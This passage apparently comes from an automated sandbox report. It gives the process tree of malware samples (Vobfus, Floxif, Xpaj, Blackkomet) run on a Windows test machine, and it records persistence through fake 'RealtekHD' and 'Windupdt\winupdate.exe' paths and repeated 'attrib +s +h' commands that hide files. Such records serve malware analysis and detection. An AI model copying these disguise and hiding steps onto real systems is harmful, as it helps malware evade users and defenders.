        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF614.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF613.tmp"
        6⤵
        
        PID:1616
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\papcoyrb.cmdline"
        5⤵
        
        PID:1872
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF70D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF70C.tmp"
        6⤵
        
        PID:2164
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\okyi_l7_.cmdline"
        5⤵
        
        PID:2956
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF864.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF863.tmp"
        6⤵
        
        PID:864
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\uqfmkdfe.cmdline"
        5⤵
        
        PID:2024
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF96E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF96D.tmp"
        6⤵
        
        PID:264
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\qpkhwks4.cmdline"
        5⤵
        
        PID:2932
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFAD4.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcFAD3.tmp"
        6⤵
        
        PID:1948
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\x1dbcf7x.cmdline"
        5⤵
        
        PID:1672
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFC1C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcFC0B.tmp"
        6⤵
        
        PID:2556
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\pmut4-s-.cmdline"
        5⤵
        
        PID:2440
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ybuxf3hf.cmdline"
        5⤵
        
        PID:2248
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\zl8p12kh.cmdline"
        5⤵
        
        PID:1004
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\u-okurct.cmdline"
        5⤵
        
        PID:2372
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFF18.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcFF17.tmp"
        6⤵
        
        PID:932
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\oxceo3je.cmdline"
        5⤵
        
        PID:1784
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\fkjax35p.cmdline"
        5⤵
        
        PID:1964
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\asuxil8e.cmdline"
        5⤵
        
        PID:2996
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\bjb5er9k.cmdline"
        5⤵
        
        PID:876
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\7x4arqs4.cmdline"
        5⤵
        
        PID:2732
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\g7sgcc3f.cmdline"
        5⤵
        
        PID:1652
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\arfenezu.cmdline"
        5⤵
        
        PID:1808
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\flamcsxt.cmdline"
        5⤵
        
        PID:1412
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES39B.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc39A.tmp"
        6⤵
        
        PID:920
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\6fmecsip.cmdline"
        5⤵
        
        PID:2320
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES456.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc455.tmp"
        6⤵
        
        PID:1828
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\v6vp9qgz.cmdline"
        5⤵
        
        PID:544
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\f5bbgidf.cmdline"
        5⤵
        
        PID:1204
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\c54ne_mh.cmdline"
        5⤵
        
        PID:2648
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES668.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc658.tmp"
        6⤵
        
        PID:2784
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\awljugcj.cmdline"
        5⤵
        
        PID:788
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\irlnib0o.cmdline"
        5⤵
        
        PID:272
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\j7gj4msx.cmdline"
        5⤵
        
        PID:1880
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7CF.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc7CE.tmp"
        6⤵
        
        PID:2348
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\8xhbbued.cmdline"
        5⤵
        
        PID:2956
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8B9.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc8A9.tmp"
        6⤵
        
        PID:1736
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ce2ug2tl.cmdline"
        5⤵
        
        PID:264
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\inr-cnte.cmdline"
        5⤵
        
        PID:3064
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\vp52rz4s.cmdline"
        5⤵
        
        PID:316
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA5E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA5D.tmp"
        6⤵
        
        PID:2224
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ez61_pq4.cmdline"
        5⤵
        
        PID:1172
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\zn7ymy2w.cmdline"
        5⤵
        
        PID:2456
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ll7aofiw.cmdline"
        5⤵
        
        PID:664
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFCB.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcFCA.tmp"
        6⤵
        
        PID:2968
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\tvql8xay.cmdline"
        5⤵
        
        PID:3016
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES123B.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc123A.tmp"
        6⤵
        
        PID:2884
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\57snkk6q.cmdline"
        5⤵
        
        PID:3780
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCB6C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcCB6B.tmp"
        6⤵
        
        PID:3768
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\nmjomn4g.cmdline"
        5⤵
        
        PID:1992
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF411.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF410.tmp"
        6⤵
        
        PID:3248

C:\Users\Admin\Desktop\Vobfus\Vobus.exe
"C:\Users\Admin\Desktop\Vobfus\Vobus.exe"
1⤵
PID:2096
- C:\Users\Admin\moohue.exe
  "C:\Users\Admin\moohue.exe"
  2⤵
  PID:2196

C:\Windows\system32\taskeng.exe
taskeng.exe {F6FC2F10-EE76-42E9-9ADD-B3662E8B4447} S-1-5-21-3692679935-4019334568-335155002-1000:BCXRJFKE\Admin:Interactive:[1]
1⤵
PID:340
- C:\Programdata\RealtekHD\taskhostw.exe
  C:\Programdata\RealtekHD\taskhostw.exe
  2⤵
  PID:1896
- C:\Programdata\RealtekHD\taskhostw.exe
  C:\Programdata\RealtekHD\taskhostw.exe
  2⤵
  PID:2164
- C:\Programdata\RealtekHD\taskhostw.exe
  C:\Programdata\RealtekHD\taskhostw.exe
  2⤵
  PID:1880
- C:\Programdata\RealtekHD\taskhostw.exe
  C:\Programdata\RealtekHD\taskhostw.exe
  2⤵
  PID:3920
- C:\Programdata\RealtekHD\taskhostw.exe
  C:\Programdata\RealtekHD\taskhostw.exe
  2⤵
  PID:3776
- C:\Programdata\RealtekHD\taskhostw.exe
  C:\Programdata\RealtekHD\taskhostw.exe
  2⤵
  PID:3188

C:\Users\Admin\Desktop\Nople.exe
"C:\Users\Admin\Desktop\Nople.exe"
1⤵
PID:2120

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "198354717217503862261338999971107732231-126558201250781811-1979366539661869877"
1⤵
PID:2360

C:\Users\Admin\Desktop\Floxif\Floxif.exe
"C:\Users\Admin\Desktop\Floxif\Floxif.exe"
1⤵
PID:2348
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2348 -s 220
  2⤵
  - Program crash
  PID:2004

C:\Users\Admin\Desktop\Floxif\Floxif.exe
"C:\Users\Admin\Desktop\Floxif\Floxif.exe"
1⤵
PID:1092
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 220
  2⤵
  - Program crash
  PID:264

C:\Users\Admin\Desktop\Xpaj\xpajB.exe
"C:\Users\Admin\Desktop\Xpaj\xpajB.exe"
1⤵
PID:3048

C:\Users\Admin\Desktop\Blackkomet.exe
"C:\Users\Admin\Desktop\Blackkomet.exe"
1⤵
PID:1712
- C:\Windows\SysWOW64\notepad.exe
  notepad
  2⤵
  PID:2884
- C:\Windows\SysWOW64\attrib.exe
  attrib "C:\Users\Admin\Desktop\Blackkomet.exe" +s +h
  2⤵
  - Sets file to hidden
  PID:2892
- C:\Windows\SysWOW64\attrib.exe
  attrib "C:\Users\Admin\Desktop" +s +h
  2⤵
  - Sets file to hidden
  - Views/modifies file attributes
  PID:2088
- C:\Windows\SysWOW64\Windupdt\winupdate.exe
  "C:\Windows\system32\Windupdt\winupdate.exe"
  2⤵
  PID:2004
- - C:\Windows\SysWOW64\notepad.exe
    notepad
    3⤵
    PID:2932
- - C:\Windows\SysWOW64\attrib.exe
    attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
    3⤵
    PID:1596
- - C:\Windows\SysWOW64\attrib.exe
    attrib "C:\Windows\SysWOW64\Windupdt" +s +h
    3⤵
    PID:2244
- - C:\Windows\SysWOW64\Windupdt\winupdate.exe
    "C:\Windows\system32\Windupdt\winupdate.exe"
    3⤵
    PID:2812
  - - C:\Windows\SysWOW64\notepad.exe
      notepad
      4⤵
      PID:2092
  - - C:\Windows\SysWOW64\attrib.exe
      attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:2408
  - - C:\Windows\SysWOW64\attrib.exe
      attrib "C:\Windows\SysWOW64\Windupdt" +s +h
      4⤵
      PID:864
  - - C:\Windows\SysWOW64\Windupdt\winupdate.exe
      "C:\Windows\system32\Windupdt\winupdate.exe"
      4⤵
      PID:2976
    - - C:\Windows\SysWOW64\notepad.exe
        
        notepad
        5⤵
        
        PID:2924
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        5⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:2352
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        5⤵
        Sets file to hidden
        
        PID:2276
    - - C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        5⤵
        
        PID:2740
      - C:\Windows\SysWOW64\notepad.exe
        
        notepad
        6⤵
        
        PID:2920
      - C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        6⤵
        Views/modifies file attributes
        
        PID:1684
      - C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        6⤵
        Views/modifies file attributes
        
        PID:1532
      - C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        6⤵
        
        PID:2912
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        7⤵
        
        PID:2224
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        7⤵
        
        PID:2540
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        7⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:2080
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        7⤵
        
        PID:2864
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        8⤵
        
        PID:2692
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        8⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:1460
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        8⤵
        Sets file to hidden
        
        PID:264
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        8⤵
        
        PID:1948
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        9⤵
        
        PID:2276
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        9⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:2368
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        9⤵
        Sets file to hidden
        
        PID:2596
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        9⤵
        
        PID:1864
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        10⤵
        
        PID:2140
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        10⤵
        Sets file to hidden
        
        PID:2352
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        10⤵
        Sets file to hidden
        
        PID:2360
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        10⤵
        
        PID:1488
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        11⤵
        
        PID:2368
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        11⤵
        Sets file to hidden
        
        PID:2536
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        11⤵
        Views/modifies file attributes
        
        PID:1712
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        11⤵
        
        PID:1580
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        12⤵
        
        PID:2360
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        12⤵
        Sets file to hidden
        
        PID:2848
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        12⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:2528
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        12⤵
        
        PID:944
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        13⤵
        
        PID:264
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        13⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:2072
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        13⤵
        Views/modifies file attributes
        
        PID:896
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        13⤵
        
        PID:1320
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        14⤵
        
        PID:604
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        14⤵
        Sets file to hidden
        
        PID:2456
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        14⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:2780
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        14⤵
        
        PID:2132
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        15⤵
        
        PID:2084
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        15⤵
        Views/modifies file attributes
        
        PID:324
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        15⤵
        Views/modifies file attributes
        
        PID:1660
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        15⤵
        
        PID:2556
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        16⤵
        
        PID:1204
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        16⤵
        Sets file to hidden
        
        PID:1948
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        16⤵
        
        PID:1964
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        16⤵
        
        PID:1872
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        17⤵
        
        PID:588
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        17⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:2620
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        17⤵
        
        PID:2616
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        17⤵
        
        PID:2672
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        18⤵
        
        PID:1664
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        18⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:1556
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        18⤵
        Sets file to hidden
        
        PID:920
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        18⤵
        
        PID:1996
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        19⤵
        
        PID:1532
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        19⤵
        Views/modifies file attributes
        
        PID:676
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        19⤵
        Sets file to hidden
        
        PID:1920
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        19⤵
        
        PID:316
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        20⤵
        
        PID:2080
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        20⤵
        
        PID:676
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        20⤵
        Views/modifies file attributes
        
        PID:2772
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        20⤵
        
        PID:1868
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        21⤵
        
        PID:2768
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        21⤵
        Views/modifies file attributes
        
        PID:1172
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        21⤵
        Sets file to hidden
        
        PID:1660
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        21⤵
        
        PID:1708
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        22⤵
        
        PID:2328
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        22⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:1464
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        22⤵
        Views/modifies file attributes
        
        PID:1812
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        22⤵
        
        PID:1868
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        23⤵
        
        PID:272
        
        C:\Windows\SysWOW64\attrib.exe
        
